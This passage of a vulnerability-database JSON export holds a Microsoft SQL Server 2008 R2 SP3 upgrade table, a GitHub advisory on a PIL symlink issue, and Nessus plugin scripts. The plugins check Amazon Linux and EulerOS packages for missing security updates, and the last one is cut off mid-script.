Installation</a>.<br/><br/>Use the following table to identify the location and name of the file to download based on your currently installed version. The download pages provide system requirements and basic installation instructions.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Version you currently have installed</th><th class=\"sbody-th\">Action you want to take</th><th class=\"sbody-th\">File to download and install</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</td><td class=\"sbody-td\">Upgrade to the 32-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of SQL Server 2008 R2 RTM Express or SQL Server 2008 R2 SP1 Express or SQL Server 2008 R2 SP3 Express</td><td class=\"sbody-td\">Upgrade to the 32-bit version of SQL Server 2008 R2 SP3 Express</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of only the client and manageability tools for SQL Server 2008 R2 or SQL Server 2008 R2 SP1 (including SQL Server 2008 R2 Management Studio) or SQL Server 2008 R2 SP2 (including SQL Server 2008 R2 Management Studio)</td><td class=\"sbody-td\">Upgrade the client and manageability tools to the 32-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of SQL Server 2008 R2 Management Studio Express or SQL Server 2008 R2 SP1 Management Studio Express or SQL Server 2008 R2 SP2 Management Studio Express</td><td class=\"sbody-td\">Upgrade to the 32-bit version of SQL Server 2008 R2 SP3 Management Studio Express</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Both of the following:<ul class=\"sbody-free_list\"><li>A 32-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</li><li>A 32-bit version of the client and manageability tools (including SQL Server 2008 R2 RTM Management Studio)</li></ul></td><td class=\"sbody-td\">Upgrade all products to the 32-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 32-bit version of one or more tools from the Microsoft SQL Server 2008 R2 RTM Feature Pack</td><td class=\"sbody-td\">Upgrade the tools to the 32-bit version of Microsoft SQL Server 2008 R2 SP3 Feature Pack</td><td class=\"sbody-td\">One or more files from Microsoft SQL Server 2008 R2 SP3 Feature Pack</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">No 32-bit installation of SQL Server 2008 R2</td><td class=\"sbody-td\">Install SQL Server 2008 R2 Management Studio including SP3</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/en-us/download/details.aspx?id=30438\" id=\"kb-link-9\" target=\"_self\">SQLManagementStudio_x86_ENU.exe</a> install the free SQL Server 2008 R2 SP2 Management Studio Express Edition; then, SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</td><td class=\"sbody-td\">Upgrade to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit bit version of SQL Server 2008 R2 RTM Express or SQL Server 2008 R2 SP1 Express or SQL Server 2008 R2 SP2 Express</td><td class=\"sbody-td\">Upgrade to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of only the client and manageability tools for SQL Server 2008 R2 or SQL Server 2008 R2 SP1 (including SQL Server 2008 R2 Management Studio) or SQL Server 2008 R2 SP2 (including SQL Server 2008 R2 Management Studio)</td><td class=\"sbody-td\">Upgrade the client and manageability tools to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of SQL Server 2008 R2 Management Studio Express or SQL Server 2008 R2 SP1 Management Studio Express or SQL Server 2008 R2 SP2 Management Studio Express</td><td class=\"sbody-td\">Upgrade to the 64-bit version of SQL Server 2008 R2 SP3 Management Studio Express</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Both of the following:<ul class=\"sbody-free_list\"><li>A 64-bit version of any edition of SQL Server 2008 R2 or SQL Server 2008 R2 SP1 or SQL Server 2008 R2 SP2</li><li>A 64-bit version of the client and manageability tools (including SQL Server 2008 R2 RTM Management Studio)</li></ul></td><td class=\"sbody-td\">Upgrade all products to the 64-bit version of SQL Server 2008 R2 SP3</td><td class=\"sbody-td\">SQLServer2008R2SP3-KB2979597-x64-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">A 64-bit version of one or more tools from the Microsoft SQL Server 2008 R2 RTM Feature Pack</td><td class=\"sbody-td\">Upgrade the tools to the 64-bit version of Microsoft SQL Server 2008 R2 SP3 Feature Pack</td><td class=\"sbody-td\">One or more files from Microsoft SQL Server 2008 R2 SP3 Feature Pack</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">No 64-bit installation of SQL Server 2008 R2</td><td class=\"sbody-td\">Install Server 2008 R2 including SP2</td><td class=\"sbody-td\"><a href=\"http://go.microsoft.com/fwlink/?linkid=251791\" id=\"kb-link-11\" target=\"_self\">SQL Server 2008 R2 SP2 \u2013 Express Edition</a> and then SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">No 64-bit installation of SQL Server 2008 R2 Management Studio</td><td class=\"sbody-td\">Install SQL Server 2008 R2 Management Studio including SP3</td><td class=\"sbody-td\"><a href=\"http://www.microsoft.com/en-us/download/details.aspx?id=30438\" id=\"kb-link-12\" target=\"_self\">SQLManagementStudio_x64_ENU.exe</a> to install the free SQL Server 2008 R2 SP2 Management Studio Express Edition; then, SQLServer2008R2SP3-KB2979597-x86-ENU.exe</td></tr></tbody></table></div><span class=\"text-base\">Note</span> After you install the service pack, the SQL Service version should be reflected as 10.50.6000.34.<div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Copyright attributions</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p></p><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li><span>This product contains software derived from the Xerox Secure Hash Function.</span></li><li><span>This product includes software from the zlib general purpose compression library.</span></li><li><span>Parts of this software are based in part on the work of RSA Data Security, Inc. Because Microsoft has included the RSA Data Security, Inc., software in this product, Microsoft is required to include the text below that accompanied such software: </span><ul class=\"sbody-free_list\"><li><span>Copyright 1990, RSA Data Security, Inc. All rights reserved.</span></li><li><span>License to copy and use this software is granted provided that it is identified as the \"RSA Data Security, Inc., MD5 Message-Digest Algorithm\" in all material mentioning or referencing this software or this function. License is also granted to make and use derivative works provided that such works are identified as \"derived from the RSA Data Security, Inc., MD5 Message-Digest Algorithm\" in all material mentioning or referencing the derived work.</span></li><li><span>RSA Data Security, Inc., makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided \"as is\" without express or implied warranty of any kind.</span></li></ul><span>These notices must be retained in any copies of any part of this documentation or software.</span></li><li><span>The Reporting Services mapping feature uses data from TIGER/Line Shapefiles that are provided courtesy of the U.S. Census Bureau (<a href=\"http://go.microsoft.com/fwlink/?linkid=179079\" id=\"kb-link-13\" target=\"_self\">http://www.census.gov/</a>). TIGER/Line Shapefiles are an extract of selected geographic and cartographic information from the Census MAF/TIGER database. TIGER/Line Shapefiles are available without charge from the U.S. Census Bureau. To obtain more information about the TIGER/Line shapefiles, go to <a href=\"http://go.microsoft.com/fwlink/?linkid=179080\" id=\"kb-link-14\" target=\"_self\">http://www.census.gov/geo/www/tiger</a>. The boundary information in the TIGER/Line Shapefiles is for statistical data collection and tabulation purposes only; its depiction and designation for statistical purposes does not constitute a determination of jurisdictional authority, rights of ownership, or entitlement, and does not reflect legal land descriptions. Census TIGER and TIGER/Line are registered trademarks of the U.S. Bureau of the Census.</span></li></ul><span>Copyright 2012 Microsoft. All rights reserved. </span></div></div></div></div></div><h2>References</h2><div class=\"kb-references-section section\"><span>For more information about how to determine the current SQL Server version and edition, click the following article number to go to the article in the Microsoft Knowledge Base: <br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/321185\" id=\"kb-link-15\">321185 </a> <br/> How to identify your SQL Server version and edition <br/> </div></span><span>The third-party products that this article discusses are manufactured by companies that are independent of Microsoft. Microsoft makes no warranty, implied or otherwise, about the performance or reliability of these products.</span></div></body></html>", "modified": "2020-05-20T01:51:36", "id": "KB2979597", "href": "https://support.microsoft.com/en-us/help/2979597/", "published": "2020-05-20T01:50:28", "title": "SQL Server 2008 R2 Service Pack 3 release information", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}], "github": [{"lastseen": "2020-05-18T21:09:29", "bulletinFamily": "software", "description": "The (1) JpegImagePlugin.py and (2) EpsImagePlugin.py scripts in Python Image Library (PIL) 1.1.7 and earlier and Pillow before 2.3.1 uses the names of temporary files on the command line, which makes it easier for local users to conduct symlink attacks by listing the processes.", "modified": "2020-05-18T17:41:19", "published": "2020-05-18T17:41:19", "id": "GHSA-R854-96GQ-RFG3", "href": "https://github.com/advisories/GHSA-r854-96gq-rfg3", "title": "Python Image Library (PIL) allows symlink attacks", "type": "github", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2020-05-21T16:57:52", "bulletinFamily": "scanner", "description": "Buffer overflow in the XML parser in Mozilla Firefox before 38.0,\nFirefox ESR 31.x before 31.7, and Thunderbird before 31.7 allows\nremote attackers to execute arbitrary code by providing a large amount\nof compressed XML data, a related issue to CVE-2015-1283 .\n(CVE-2015-2716)", "modified": "2020-05-15T00:00:00", "id": "ALA_ALAS-2020-1364.NASL", "href": "https://www.tenable.com/plugins/nessus/136625", "published": "2020-05-15T00:00:00", "title": "Amazon Linux AMI : expat (ALAS-2020-1364)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2020-1364.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136625);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/19\");\n\n script_cve_id(\"CVE-2015-2716\");\n script_xref(name:\"ALAS\", value:\"2020-1364\");\n\n script_name(english:\"Amazon Linux AMI : expat (ALAS-2020-1364)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Buffer overflow in the XML parser in Mozilla Firefox before 38.0,\nFirefox ESR 31.x before 31.7, and Thunderbird before 31.7 allows\nremote attackers to execute arbitrary code by providing a large amount\nof compressed XML data, a related issue to CVE-2015-1283 .\n(CVE-2015-2716)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2020-1364.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update expat' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:expat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:expat-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:expat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"expat-2.1.0-11.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"expat-debuginfo-2.1.0-11.22.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"expat-devel-2.1.0-11.22.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"expat / expat-debuginfo / expat-devel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T16:49:54", "bulletinFamily": "scanner", "description": "According to the versions of the gnupg2 package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - kbx/keybox-search.c in GnuPG before 1.4.19, 2.0.x\n before 2.0.27, and 2.1.x before 2.1.2 does not properly\n handle bitwise left-shifts, which allows remote\n attackers to cause a denial of service (invalid read\n operation) via a crafted keyring file, related to sign\n extensions and ", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1563.NASL", "href": "https://www.tenable.com/plugins/nessus/136266", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : gnupg2 (EulerOS-SA-2020-1563)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136266);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2015-1606\",\n \"CVE-2015-1607\"\n );\n script_bugtraq_id(\n 72609,\n 72610\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : gnupg2 (EulerOS-SA-2020-1563)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the gnupg2 package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - kbx/keybox-search.c in GnuPG before 1.4.19, 2.0.x\n before 2.0.27, and 2.1.x before 2.1.2 does not properly\n handle bitwise left-shifts, which allows remote\n attackers to cause a denial of service (invalid read\n operation) via a crafted keyring file, related to sign\n extensions and 'memcpy with overlapping\n ranges.'(CVE-2015-1607)\n\n - The keyring DB in GnuPG before 2.1.2 does not properly\n handle invalid packets, which allows remote attackers\n to cause a denial of service (invalid read and\n use-after-free) via a crafted keyring\n file.(CVE-2015-1606)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1563\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?44222924\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gnupg2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:gnupg2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"gnupg2-2.0.22-5.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnupg2\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-08T16:49:38", "bulletinFamily": "scanner", "description": "According to the versions of the perl packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The XSLoader::load method in XSLoader in Perl does not\n properly locate .so files when called in a string eval,\n which might allow local users to execute arbitrary code\n via a Trojan horse library under the current working\n directory.(CVE-2016-6185)\n\n - The Dumper method in Data::Dumper before 2.154, as used\n in Perl 5.20.1 and earlier, allows context-dependent\n attackers to cause a denial of service (stack\n consumption and crash) via an Array-Reference with many\n nested Array-References, which triggers a large number\n of recursive calls to the DD_dump\n function.(CVE-2014-4330)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1527.NASL", "href": "https://www.tenable.com/plugins/nessus/136230", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : perl (EulerOS-SA-2020-1527)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136230);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2014-4330\",\n \"CVE-2016-6185\"\n );\n script_bugtraq_id(\n 70142\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : perl (EulerOS-SA-2020-1527)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the perl packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The XSLoader::load method in XSLoader in Perl does not\n properly locate .so files when called in a string eval,\n which might allow local users to execute arbitrary code\n via a Trojan horse library under the current working\n directory.(CVE-2016-6185)\n\n - The Dumper method in Data::Dumper before 2.154, as used\n in Perl 5.20.1 and earlier, allows context-dependent\n attackers to cause a denial of service (stack\n consumption and crash) via an Array-Reference with many\n nested Array-References, which triggers a large number\n of recursive calls to the DD_dump\n function.(CVE-2014-4330)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1527\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8068d3bb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected perl packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Pod-Escapes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"perl-5.16.3-292.h12\",\n \"perl-Pod-Escapes-1.04-292.h12\",\n \"perl-libs-5.16.3-292.h12\",\n \"perl-macros-5.16.3-292.h12\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T16:49:50", "bulletinFamily": "scanner", "description": "According to the version of the libjpeg-turbo package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerability :\n\n - libjpeg-turbo before 1.3.1 allows remote attackers to\n cause a denial of service (crash) via a crafted JPEG\n file, related to the Exif marker.(CVE-2014-9092)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1555.NASL", "href": "https://www.tenable.com/plugins/nessus/136258", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : libjpeg-turbo (EulerOS-SA-2020-1555)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136258);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2014-9092\"\n );\n script_bugtraq_id(\n 71326\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : libjpeg-turbo (EulerOS-SA-2020-1555)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libjpeg-turbo package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerability :\n\n - libjpeg-turbo before 1.3.1 allows remote attackers to\n cause a denial of service (crash) via a crafted JPEG\n file, related to the Exif marker.(CVE-2014-9092)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1555\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2c3f00f7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libjpeg-turbo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n 